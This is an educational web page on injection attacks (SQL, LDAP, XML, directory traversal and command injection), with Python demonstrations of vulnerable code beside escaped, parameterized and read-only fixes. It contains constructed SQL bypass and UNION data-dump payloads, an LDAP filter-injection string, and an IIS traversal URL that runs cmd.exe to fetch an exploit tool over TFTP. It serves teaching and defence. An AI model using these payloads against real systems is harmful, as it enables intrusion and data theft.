SHREE LEARNING ACADEMY
Injection Attacks
An injection attack is an attack in which the attacker supplies crafted input that the targeted system interprets as code or commands rather than as plain data, letting the attacker alter the system's behaviour and read or corrupt the data behind it. The methods used are varied and numerous. An injection attack is usually named either for the specific backend it reaches or for the kind of malicious payload it inserts into the target. Common types include SQL injection, LDAP injection, XML injection, command injection, HTML injection, code injection, and file injection.
From the organization's point of view, SQL injection attacks are generally treated as a greater risk than XSS attacks (explained in the following chapter): SQL injection targets the organization's own assets, whereas XSS targets its website visitors or customers. The objective of a SQL injection attack is to manipulate or exploit a web application through unanticipated input. Rather than deceiving a user, the attacker uses such input to gain illicit access to a database or other backend assets.
In the early days of the internet, web pages were static: they did not change over time. Webmasters produced pages containing information and stored them on a web server for users to retrieve with their browsers. As users began to demand content personalized to their own preferences, the static page model became insufficient. Visitors to a bank website, for instance, are not satisfied with static pages describing the bank's services, hours, and locations. They also want dynamic information tailored to them, such as the details of their own accounts. It is infeasible for webmasters to hand-build a page on the server for every user containing that user's account information; for a large bank, creating and maintaining millions of constantly changing pages would be a monumental task. This is where dynamic web applications become essential.
Web applications use a database to generate content on the fly in response to user requests. In a banking application, the user logs in with an account number and password. After a successful login, the web application retrieves the latest account information from the bank's database and dynamically generates a page showing the user's current account details. If the same user returns an hour later, the server again fetches fresh account information from the database and displays it.
Why does this matter to a security professional? Because web applications add complexity to the conventional network security model. The web server is a publicly accessible host, so it belongs in a separate network zone such as a demilitarized zone (DMZ), away from other servers. The database server, by contrast, is for internal use only and belongs in the internal network or in a secured subnet segregated from the DMZ. For the web application to reach the database, the firewall administrator must add a rule permitting traffic from the web server to the database server. That rule should be as narrow as possible (from the web server's address only, to the database port only), but however tight it is, it also creates a path by which an attacker on the internet who can make the web application issue requests on their behalf reaches the database.
If the web application is working correctly, it passes only authorized requests to the database. A flaw in the application, however, can let a user manipulate the database in unexpected and unauthorized ways, and that is what a SQL injection vulnerability is: it lets an attacker run SQL statements of their own choosing on the underlying database. Depending on the application and on the privileges of its database account, an attacker can bypass authentication, extract sensitive data from tables, alter existing records, create new ones, delete whole tables or databases, and even obtain command-line-like access through database features such as command shell stored procedures.
Measures
Two measures are commonly used to safeguard web applications against SQL injection attacks:
1. Perform input validation:
Input validation restricts what a user can submit through a form: which data types and characters are accepted, and how much input. Guarding against the many forms of input injection and manipulation calls for a layered defense that can combine allow-list (whitelist) filters, which accept only what is known to be good, with deny-list (blacklist) filters, which reject known-bad patterns; allow-lists are the stronger of the two, since a deny-list catches only what someone anticipated. The primary input controls are limiting input length, filtering known malicious content patterns, and escaping metacharacters.
Metacharacters:
Metacharacters are characters that carry a specific programmatic meaning to the parser or interpreter that reads them, and so behave in ways ordinary characters do not. Common examples are the period (dot); the backslash; open and close square brackets; the vertical bar (pipe); the semicolon; the dollar sign; the plus sign; the question mark; the caret; open and close curly braces; the ampersand; single and double quotation marks; and open and close parentheses:
. \ [ ] | ; $ + ? ^ { } & ' " ( )
To escape a metacharacter is to mark it so that it is read as an ordinary character, with no special meaning or function. The mark is a special character or sequence that tells the interpreter to take the next character literally, stripping it of its programmatic power. A common method is to put a backslash before the character (\^), but the correct escape sequence depends on the language or execution environment that will read the input: what neutralizes a character in a shell is not what neutralizes it in SQL, so the escaping must match the context the input lands in.
2. Limit account privileges
The database account used by the web application should hold the fewest privileges needed. If the application only reads data, grant it the ability to read and nothing more; then even a successful injection cannot alter or drop tables, and any command shell stored procedure the database offers stays out of reach of an account that was never granted it. In essence, SQL injection is a weakness of the script that mediates between the front end (usually a web server) and the database. A script written defensively, one that escapes or rejects metacharacters, closes most such holes, but escaping is fragile: it has to be correct for every context the input lands in (string, numeric, identifier). The most reliable defense is to keep user input out of the query text altogether with parameterized queries (prepared statements), in which the database receives the query structure and the data separately and never parses the data as SQL.
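The flaw described above and both measures, side by side, as an added example that is not part of the original page. Python's built-in sqlite3 module stands in for the bank's database; the user table and the two payloads are constructed for the demonstration; and the read-only authorizer hook is an assumed stand-in for a database account granted read access only, since SQLite has no accounts of its own. The example shows the escaping the page describes next to a parameterized query, so the difference in robustness can be seen directly.

```python
import sqlite3

# Constructed sample data for the demonstration (not taken from the page).
SAMPLE_USERS = [
    ("alice", "s3cret", "admin"),
    ("bob", "hunter2", "user"),
]


def build_db():
    """In-memory database standing in for the bank's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flawed script: input is pasted into the SQL text, so a quote or a
    comment marker in the input becomes part of the query's structure."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def escape_sql_literal(value):
    """Escape the metacharacter that terminates a SQL string literal:
    a single quote is written as two single quotes."""
    return value.replace("'", "''")


def login_escaped(conn, username, password):
    """The page's remedy: escape metacharacters before building the query."""
    query = ("SELECT username, role FROM users WHERE username = '"
             + escape_sql_literal(username) + "' AND password = '"
             + escape_sql_literal(password) + "'")
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    """Parameterized query: the driver binds the input to the placeholders as
    data, so it is never parsed as SQL, whatever characters it contains."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Least privilege. A real deployment grants the web application's database
# account SELECT only. SQLite has no accounts, so this authorizer hook is an
# assumed stand-in for that grant: every write action is refused.
WRITE_ACTIONS = {
    sqlite3.SQLITE_INSERT, sqlite3.SQLITE_UPDATE, sqlite3.SQLITE_DELETE,
    sqlite3.SQLITE_DROP_TABLE, sqlite3.SQLITE_CREATE_TABLE,
    sqlite3.SQLITE_ALTER_TABLE,
}


def read_only_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    return sqlite3.SQLITE_DENY if action in WRITE_ACTIONS else sqlite3.SQLITE_OK


def write_blocked(conn, statement):
    """True if the database refused the (injected) write statement."""
    try:
        conn.execute(statement)
        return False
    except sqlite3.DatabaseError:      # "not authorized" from the authorizer
        return True


if __name__ == "__main__":
    conn = build_db()
    bypass = "' OR '1'='1' --"                                   # constructed
    dump = "' UNION SELECT password, username FROM users --"     # constructed
    print("vulnerable, bypass:", login_vulnerable(conn, bypass, "x"))
    print("vulnerable, dump  :", login_vulnerable(conn, dump, "x"))
    print("escaped, bypass   :", login_escaped(conn, bypass, "x"))
    print("parameterized     :", login_parameterized(conn, bypass, "x"))
    conn.set_authorizer(read_only_authorizer)
    print("DELETE blocked    :", write_blocked(conn, "DELETE FROM users"))
```

The bypass payload turns the WHERE clause into "username = '' OR '1'='1'" and comments out the password check, so the vulnerable function returns every user; the UNION payload returns the password column in place of the role column. Both the escaped and the parameterized versions return nothing for those inputs, and once the read-only authorizer is in place even a successful injection cannot delete the table.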
An LDAP injection attack is an input injection attack whose target backend is an LDAP directory service rather than a database server. Web server front-end scripts that build LDAP statements (search filters or distinguished names) from user input can fall prey to it. As with SQL injection, the defenses are input sanitization and defensive coding, in particular escaping the characters that carry meaning inside an LDAP filter.
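Escaping for an LDAP search filter, as an added example that is not part of the original page. The escape table follows RFC 4515 (backslash, asterisk, parentheses and NUL are written as a backslash followed by two hex digits); the filter shape and the injection payload are constructed for the demonstration.

```python
# Characters with special meaning inside an LDAP search filter (RFC 4515)
# and their escaped forms.
LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value):
    """Escape a user-supplied value so it is matched literally in a filter."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_vulnerable(username):
    """Filter built by pasting the raw username into the filter string."""
    return "(&(uid=%s)(objectClass=inetOrgPerson))" % username


def login_filter_safe(username):
    """The same filter with the value escaped first."""
    return "(&(uid=%s)(objectClass=inetOrgPerson))" % escape_ldap_filter_value(username)


def top_level_terms(filter_text):
    """Count complete parenthesised expressions at the top level of a filter.
    A well-formed login filter has exactly one; a payload that closes the
    (&...) early and opens a new expression produces more than one."""
    depth = 0
    terms = 0
    for ch in filter_text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                terms += 1
    return terms


if __name__ == "__main__":
    payload = "*)(uid=*))(|(uid=*"          # constructed injection payload
    for f in (login_filter_vulnerable(payload), login_filter_safe(payload)):
        print(top_level_terms(f), "top-level term(s):", f)
```

With the payload, the vulnerable filter becomes "(&(uid=*)(uid=*))(|(uid=*)(objectClass=inetOrgPerson))": the attacker's parentheses have closed the AND early and the object-class restriction now lives in a second, disconnected expression. The escaped version keeps the whole payload inside the uid value, where it matches nothing.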
XML injection is a similar attack in which the target backend is an XML application or parser. The remedy is the same: sanitize input before it is placed into the XML.
Directory Traversal/Command Injection
A directory traversal attack lets an attacker escape the confines of the web root directory and reach other parts of the file system of the web server's operating system. An attack using a modified URL to traverse directories was commonly used in the past against IIS 4.0 on Windows NT 4.0 Server. The goal was to climb out of the web root and reach the command prompt executable in the operating system's own folders.
For instance:
http://yourdomain.com/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+get+exploit.exe
The URL encodes the slash of a "../" (change to parent directory) sequence as %c0%af, using the percent (%) metacharacter: %c0%af is an overlong two-byte UTF-8 form of the forward slash, which a correct decoder must reject but which the vulnerable IIS accepted. The server checked the path for traversal before it decoded that sequence, so "..%c0%af.." passed as an ordinary directory name and only became "../.." when the file was opened. The attack therefore performs both directory traversal (climbing out of the web root to cmd.exe) and command injection (the query string after the ? is handed to cmd.exe as its /c argument). In the instance shown, the injected command runs a TFTP get to download an exploit tool onto the web server. The attacker can execute any command that fits within a URL, with the privileges of the IIS service.
A simpler form of the same request merely lists the root of the C drive; with slight adjustments, as above, TFTP commands pull malicious tools onto the target, giving the attacker greater remote control or even full command shell access. Escaping or filtering metacharacters is one way to prevent the attack; the decisive fix is to decode the request fully, rejecting invalid encodings, before checking that the resolved path stays inside the web root.
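The check-then-decode ordering that the IIS example above relies on, next to the corrected order, as an added example in Python that is not part of the original page. The document root, the decoder that mimics the overlong-UTF-8 bug, and the test requests are assumptions of the demonstration; only the request path is handled here, the query string that carries the injected command is left aside.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Assumed document root for the demonstration (not from the original page).
WEB_ROOT = "/var/www/html"


def lenient_decode(raw):
    """Mimic the decoder flaw behind the page's example: an overlong two-byte
    UTF-8 sequence such as 0xC0 0xAF is accepted and yields the ASCII
    character it encodes ('/'), so "..%c0%af" becomes "../" only after
    decoding. Any other non-ASCII byte is replaced by '?'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("?")
            i += 1
    return "".join(out)


def _contain(path_text, web_root):
    """Join path_text under web_root, normalize away '.' and '..', and return
    the result only if it still lies inside web_root; otherwise None."""
    resolved = posixpath.normpath(posixpath.join(web_root, path_text.lstrip("/")))
    if resolved == web_root or resolved.startswith(web_root + "/"):
        return resolved
    return None


def flawed_server_path(url_path, web_root=WEB_ROOT):
    """The vulnerable order: containment is checked on the raw URL, and the
    (buggy) decode happens afterwards, when the file is opened. Returns the
    path that would actually be opened, or None if the raw check rejected it."""
    if _contain(url_path, web_root) is None:
        return None
    decoded = lenient_decode(unquote_to_bytes(url_path))
    return posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))


def safe_server_path(url_path, web_root=WEB_ROOT):
    """The corrected order: decode strictly first, then check containment."""
    try:
        text = unquote_to_bytes(url_path).decode("utf-8")
    except UnicodeDecodeError:
        return None            # overlong or invalid UTF-8 such as %c0%af
    if "\x00" in text or "\\" in text:
        return None
    return _contain(text, web_root)


if __name__ == "__main__":
    # Path part of the page's example URL, plus a plain percent-encoded variant.
    attack = "/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe"
    for req in (attack, "/scripts/%2e%2e/%2e%2e/etc/passwd", "/index.html"):
        print(req)
        print("  flawed order opens:", flawed_server_path(req))
        print("  safe order opens  :", safe_server_path(req))
```

With the page's path, the flawed order passes the raw check (each "..%c0%af.." looks like an ordinary directory name) and then opens /winnt/system32/cmd.exe, well outside the root; the safe order rejects the request outright because strict UTF-8 decoding refuses the overlong byte pair. The %2e%2e variant shows that the ordering flaw is not specific to Unicode: any encoding the check does not see through has the same effect.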